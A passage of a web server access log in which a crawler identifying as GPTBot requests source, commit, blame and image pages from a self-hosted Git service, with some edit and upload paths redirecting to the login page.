10700] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/branches" -[17/Feb/2026:15:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj?display=source" [Client 74.7.227.38] [Length 11509] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:15:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 9835] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" -[17/Feb/2026:15:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 9830] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" -[17/Feb/2026:15:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest" [Client 74.7.227.38] [Length 11884] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:15:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:15:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10082] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" -[17/Feb/2026:15:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20906] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14312] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15804] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18122] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:15:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:15:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:15:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:15:47:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:15:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest" -[17/Feb/2026:15:47:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:15:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest" -[17/Feb/2026:15:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15765] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10309] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9949] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9962] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:47:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PythonTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:15:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PythonTest" -[17/Feb/2026:15:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" -[17/Feb/2026:15:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" -[17/Feb/2026:15:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15558] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" -[17/Feb/2026:15:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14212] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" -[17/Feb/2026:15:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" -[17/Feb/2026:15:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13891] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" -[17/Feb/2026:15:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17252] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:15:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include" -[17/Feb/2026:15:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:15:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" -[17/Feb/2026:15:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" -[17/Feb/2026:15:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16486] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" -[17/Feb/2026:15:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13940] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" -[17/Feb/2026:15:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" -[17/Feb/2026:15:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" -[17/Feb/2026:15:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" -[17/Feb/2026:15:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14671] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" -[17/Feb/2026:15:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10140] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:15:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" -[17/Feb/2026:15:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" -[17/Feb/2026:15:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" -[17/Feb/2026:15:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14214] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" -[17/Feb/2026:15:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr 